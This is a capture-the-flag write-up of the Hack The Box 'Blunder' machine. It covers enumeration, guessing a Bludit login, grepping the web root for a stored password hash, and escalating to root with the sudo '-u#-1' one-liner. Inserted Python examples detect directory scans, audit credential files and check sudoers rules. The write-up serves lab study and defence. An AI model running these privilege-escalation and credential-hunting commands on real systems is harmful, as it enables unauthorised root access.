Blunder - [HTB]
Introduction
Blunder is an easy virtual machine based on information gathering and a weak password to obtain credentials, which are then used with Metasploit to get a shell, and finally a simple exploit to get root privileges.
Enumeration
As always, I started with a basic nmap command so that I know every open port on this machine.
sudo nmap -sS -T5 -n -p- --open 10.10.10.191 -oN AllPorts.txt
In this case, I only got port 80, so I decided on a more in-depth scan to see whether there was anything interesting on this port.
sudo nmap -sV -sC -p80 10.10.10.191 -oN portsDepth.txt
I have to say the result of this scan was next to nothing. So I decided to have a look at what is on this Apache web server.
It turned out to be something like a personal blog where this “user” posts random things.
To get more information I ran gobuster to look for hidden directories.
gobuster dir -t 20 -u http://10.10.10.191/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o Directories.txt
Between all the directories there was a login form, as you can see in the snapshot below.
I was looking for some exploits related to Bludit via searchsploit.
Unfortunately, every single one required credentials to be run.
After a long time, I decided to look for some hidden files, so I ran this command.
gobuster dir -t 20 -u http://10.10.10.191/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt
This turned up a “todo.txt” file, with a possible username called “fergus”.
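The two gobuster runs above generate exactly the traffic pattern a web server log shows during a wordlist scan: a burst of 404s for many distinct paths from one client in a short window. As an added example (not part of the original writeup), here is a small detector that parses Apache combined-format log lines and flags clients by that pattern. The log lines are constructed for the demonstration, including the IPs, timestamps and the gobuster user agent string; none of them come from the target in the writeup.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in Apache "combined" log format (not from the writeup's target).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jun/2020:14:01:00 +0000] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Jun/2020:14:01:01 +0000] "GET /images HTTP/1.1" 404 275 "-" "gobuster/3.0"
10.0.0.9 - - [10/Jun/2020:14:01:01 +0000] "GET /download HTTP/1.1" 404 275 "-" "gobuster/3.0"
10.0.0.9 - - [10/Jun/2020:14:01:02 +0000] "GET /2006 HTTP/1.1" 404 275 "-" "gobuster/3.0"
10.0.0.9 - - [10/Jun/2020:14:01:02 +0000] "GET /news HTTP/1.1" 404 275 "-" "gobuster/3.0"
10.0.0.9 - - [10/Jun/2020:14:01:03 +0000] "GET /admin HTTP/1.1" 200 4012 "-" "gobuster/3.0"
10.0.0.9 - - [10/Jun/2020:14:01:03 +0000] "GET /todo.txt HTTP/1.1" 200 118 "-" "gobuster/3.0"
10.0.0.5 - - [10/Jun/2020:14:01:30 +0000] "GET /about HTTP/1.1" 200 3301 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jun/2020:14:02:10 +0000] "GET /missing HTTP/1.1" 404 275 "-" "Mozilla/5.0"
"""

# One regex for the combined log format: client, timestamp, request line, status, size, referer, UA.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_bruteforcers(log_text, window=timedelta(seconds=60), threshold=4):
    """Return {ip: summary} for clients whose 404 count inside any sliding window
    of `window` seconds reaches `threshold`. A burst of 404s for distinct paths is
    the signature of a wordlist-driven directory scan; a single mistyped URL is not."""
    not_found = defaultdict(list)  # ip -> [(ts, path, user_agent), ...] for 404 responses
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec and rec["status"] == 404:
            not_found[rec["ip"]].append((rec["ts"], rec["path"], rec["ua"]))

    hits = {}
    for ip, events in not_found.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until it fits inside `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                in_window = events[start:end + 1]
                hits[ip] = {
                    "not_found": count,
                    "distinct_paths": len({p for _, p, _ in in_window}),
                    "user_agents": sorted({ua for _, _, ua in in_window}),
                }
                break  # one alert per client is enough
    return hits


if __name__ == "__main__":
    for ip, summary in find_bruteforcers(SAMPLE_LOG).items():
        print(ip, summary)
```

The threshold and window are deliberately low so the constructed sample triggers; on a real server you would tune them against normal 404 rates, and a user agent check alone is not enough since scanners can set any string they like.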
However, I still needed the password, so having a look at the posts I found a strange character name (written without any space… weird).
Thus, using this data I could get access to the Bludit dashboard. Hence, I could try those exploits I mentioned before.
Exploitation
I went directly with Metasploit, adding the needed values and changing the LHOST IP address.
Then I executed it, getting a simple shell.
Privilege escalation
This part is divided in two because the first part deals with getting hugo’s credentials and the second with becoming root.
Part 1
Since the user www-data doesn’t have enough permissions to read the flag stored at /home/hugo/user.txt, I looked for some credentials inside the /var/www/ directory; as there were two instances of Bludit there, I thought it was a good option.
grep -iR "hugo" . 2> /dev/null
Inside the file “./bludit-3.10.0a/bl-content/databases/users.php” was stored Hugo’s password.
cat ./bludit-3.10.0a/bl-content/databases/users.php
Instead of identifying the hash and trying to crack it myself, I preferred using CrackStation to get the actual password.
Once I had hugo’s account and the user.txt flag, I went for the root flag.
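The grep above is the attacker's side of credential hunting; the defender's side is auditing the web root for flat-file credential stores and checking who can read them. The following is an added example, not code from the writeup or from Bludit: it builds a constructed web-root mimic in a temporary directory (two Bludit-like installs with placeholder hashes, not the real users.php contents) and then reports every file that holds credential-looking keys together with whether its mode lets users other than the owner read it. Pattern names and paths are my assumptions for the demonstration.

```python
import os
import re
import stat
import tempfile

# Keys that commonly mark a stored credential in a CMS flat-file database (assumed list).
SECRET_RE = re.compile(r'(password|passwd|salt|api[_-]?key|token)', re.IGNORECASE)


def audit_tree(root):
    """Walk `root`; return one finding per file that contains credential-looking keys,
    with the keys seen and whether the file is readable by 'other' (world-readable)."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable or vanished file: skip, the walk continues
            keys = sorted({m.group(0).lower() for m in SECRET_RE.finditer(text)})
            if not keys:
                continue
            mode = os.stat(path).st_mode
            findings.append({
                "path": os.path.relpath(path, root),
                "keys": keys,
                "world_readable": bool(mode & stat.S_IROTH),
            })
    return sorted(findings, key=lambda f: f["path"])


def build_sample_tree():
    """Constructed mimic of a web root with two Bludit-like installs (not the real files)."""
    root = tempfile.mkdtemp(prefix="webroot-")

    # Newer install: a users database with placeholder hash and salt, left world-readable.
    new_db = os.path.join(root, "bludit-new", "bl-content", "databases")
    os.makedirs(new_db)
    users = os.path.join(new_db, "users.php")
    with open(users, "w") as fh:
        fh.write('<?php defined("BLUDIT") or die(); ?>\n'
                 '{"admin":{"password":"HASH-PLACEHOLDER","salt":"SALT-PLACEHOLDER"}}\n')
    os.chmod(users, 0o644)  # every local account can read this, not just the web server

    # Older install: a site database with nothing secret, and tighter permissions.
    old_db = os.path.join(root, "bludit-old", "bl-content", "databases")
    os.makedirs(old_db)
    site = os.path.join(old_db, "site.php")
    with open(site, "w") as fh:
        fh.write('{"title":"blog","description":"nothing secret here"}\n')
    os.chmod(site, 0o640)

    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write('<?php echo "hello"; ?>\n')
    return root


if __name__ == "__main__":
    for finding in audit_tree(build_sample_tree()):
        print(finding)
```

A hit with world_readable set is the case to fix first (the web server needs the file, every other local user does not); the second lesson from this box is that a CMS password reused as a system password turns a readable hash into a shell, so the audit should also trigger a check for password reuse.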
Part 2
As I always do, I looked for commands that hugo could run with sudo. However, because of Meterpreter I first needed a tty on my shell, so I used python.
$ python -c 'import pty; pty.spawn("/bin/bash")'
Once that was fixed, it turned out that hugo couldn’t simply run /bin/bash with sudo, but searching on the Internet I found this exploit.
sudo -u#-1 /bin/bash
That made me root, and I got the root flag.
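The -u#-1 trick works against sudoers rules that grant a wildcard Runas list but exclude specific users, such as (ALL, !root): sudo compares the requested uid with the excluded ones, the value -1 is not 0 so the check passes, and the kernel's setresuid() treats -1 as "leave unchanged", so the process keeps the uid 0 sudo already has. As an added example (not from the writeup, and the sudoers lines below are constructed, not the machine's real file), here is a small audit that parses sudoers rules, flags the negated-Runas pattern, and models the uid handling so the failure mode is visible.

```python
import re

# Constructed sudoers content for the demonstration (the writeup does not show the real file).
SAMPLE_SUDOERS = """\
# Defaults
Defaults env_reset
root    ALL=(ALL:ALL) ALL
hugo    ALL=(ALL, !root) /bin/bash
backup  ALL=(www-data) NOPASSWD: /usr/bin/rsync
"""

# user  host=(runas_users[:runas_groups]) [tags:] command
RULE_RE = re.compile(r'^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*(?P<cmd>.+)$')


def parse_rules(text):
    """Return the user specifications in `text` as dicts; comments, blanks and
    Defaults lines are skipped. Only the (user-list) part of the Runas spec is kept."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if m:
            rule = m.groupdict()
            user_part = rule["runas"].split(":")[0]
            rule["runas_users"] = [u.strip() for u in user_part.split(",") if u.strip()]
            rules.append(rule)
    return rules


def uses_negated_runas(rule):
    """True when the Runas list allows ALL but excludes named users, e.g. (ALL, !root).
    Such a rule relies on sudo comparing the requested uid against the exclusions,
    which is exactly the comparison the -u#-1 request sidesteps."""
    users = rule["runas_users"]
    return "ALL" in users and any(u.startswith("!") for u in users)


def uid_after_setresuid(current_uid, requested):
    """Model the kernel side: setresuid() takes -1 to mean 'do not change this id'.
    `requested` is the text after -u#, as sudo received it on the command line."""
    uid = int(requested)
    if uid == -1 or uid == 0xFFFFFFFF:  # -1 as signed, or the same 32 bits read as unsigned
        return current_uid             # sudo is already root here, so root is what remains
    return uid


def audit(text):
    """Return the users whose rules carry the negated-Runas pattern."""
    return [r["user"] for r in parse_rules(text) if uses_negated_runas(r)]


if __name__ == "__main__":
    print("rules to rewrite:", audit(SAMPLE_SUDOERS))
    print("uid after 'sudo -u#-1' on a vulnerable sudo:", uid_after_setresuid(0, "-1"))
```

The fix is twofold: a sudo that rejects the -1 and 4294967295 uid values, and sudoers rules that name the accounts a user may become instead of negating root; an audit hit on either point should not wait for the other.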